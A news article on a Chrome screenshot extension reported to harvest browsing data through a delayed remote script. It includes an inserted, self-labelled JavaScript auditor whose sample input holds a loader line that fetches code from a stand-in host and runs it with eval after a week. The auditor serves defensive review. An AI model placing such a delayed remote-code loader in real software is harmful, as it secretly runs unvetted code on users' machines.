Malicious Google Chrome extension collected users' data for third parties

"Webpage Screenshot," a Google Chrome extension, was found to be malicious by two security firms earlier this week.

A Google Chrome extension that advertises itself as a way to take screenshots of webpages is doing more than just that, according to two security firms.

The extension, “Webpage Screenshot,” is also collecting its more than one million users' browsing details in an effort to sell them to third parties, according to separate blog posts published by Heimdal Security and ScrapeSentry. The extension hides its spyware-esque behavior by waiting before it downloads the additional online code that enables the data-grabbing.

The original download code contains external URLs that lead to a JavaScript file set to run a week after the extension has been downloaded. Only after this script runs does the extension begin collecting the URLs users visit, the titles of the tabs visited, the country they're in, and the user's unique ID.

This data is then encoded and sent to a web server based in the U.S., the blog posts stated.

The extension avoids possible Google security alarms because the company cannot analyze the entire code and its spyware functions.
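
A reviewer-side check for the pattern described above, as an added example that is not code from the article or from either security firm: it scans an unpacked extension's JavaScript for the combination of an external URL, dynamic code execution and a time-based delay. The sample source, the `example.invalid` host and the pattern lists are constructed assumptions.

```javascript
// Static triage of an unpacked extension's JavaScript: flags the combination the
// article describes (external URL + dynamic code execution + time-based delay).
// Pattern lists are illustrative assumptions, not a complete detector.
const PATTERNS = {
  remoteUrl: /https?:\/\/[^\s"'`)]+/g,
  dynamicCode: /\beval\s*\(|new\s+Function\s*\(|createElement\(\s*["']script["']\s*\)|executeScript\s*\(/,
  delay: /\bsetTimeout\s*\(|\bsetInterval\s*\(|chrome\.alarms\.create|Date\.now\s*\(/,
};

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

function auditExtension(files, allowedHosts = []) {
  const report = { remoteHosts: [], dynamicCode: [], delay: [] };
  for (const [name, source] of Object.entries(files)) {
    for (const url of source.match(PATTERNS.remoteUrl) || []) {
      const host = hostOf(url);
      if (host && !allowedHosts.includes(host) && !report.remoteHosts.includes(host)) {
        report.remoteHosts.push(host);
      }
    }
    if (PATTERNS.dynamicCode.test(source)) report.dynamicCode.push(name);
    if (PATTERNS.delay.test(source)) report.delay.push(name);
  }
  // All three signals together mean the shipped code may not be the code that
  // eventually runs, so the package needs manual review.
  report.deferredRemoteCode =
    report.remoteHosts.length > 0 && report.dynamicCode.length > 0 && report.delay.length > 0;
  return report;
}

// Constructed sample input (not taken from the real extension).
const SAMPLE = {
  "background.js": [
    'const UPDATE_URL = "https://cdn.example.invalid/loader.js";',
    "const WEEK_MS = 7 * 24 * 60 * 60 * 1000;",
    "if (Date.now() - installedAt > WEEK_MS) {",
    "  fetch(UPDATE_URL).then(r => r.text()).then(code => eval(code));",
    "}",
  ].join("\n"),
  "capture.js": 'chrome.tabs.captureVisibleTab(null, {format: "png"}, save);',
};

console.log(JSON.stringify(auditExtension(SAMPLE), null, 2));
```

A hit is a reason to read the code by hand, not a verdict: many legitimate extensions use timers and contact their own servers, which is what the `allowedHosts` parameter is for.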

The BBC spoke with a spokesman for Webpage Screenshot who said nothing about the extension's data-gathering was malicious. Instead, it was “used to understand who the extension's users were and where they were located to help drive development of the code,” the news agency wrote.

Since the companies published their findings, the extension has been removed and its homepage taken down.

Because the malicious extension can be downloaded for free, its malicious behavior shouldn't be completely unexpected, said Morten Kjaersgaard, CEO of Heimdal Security, in emailed comments to SCMagazine.com.

“Users need to accept that, in general, nothing is free,” he said. “If you choose to use free extensions, then most likely your data is being used in some connection.”

For its part, Google cannot spot these privacy-invading extensions because to do so, it would need to conduct a full review of the code and how the applications communicate, Kjaersgaard said. In an “open” system, which includes extensions, the task is nearly impossible.

New research from UC Santa Barbara computer scientist Alexandros Kapravelos suggests that millions of people have downloaded malicious extensions on Chrome, and his findings pushed Google to remove 192 active ones, the BBC reported.
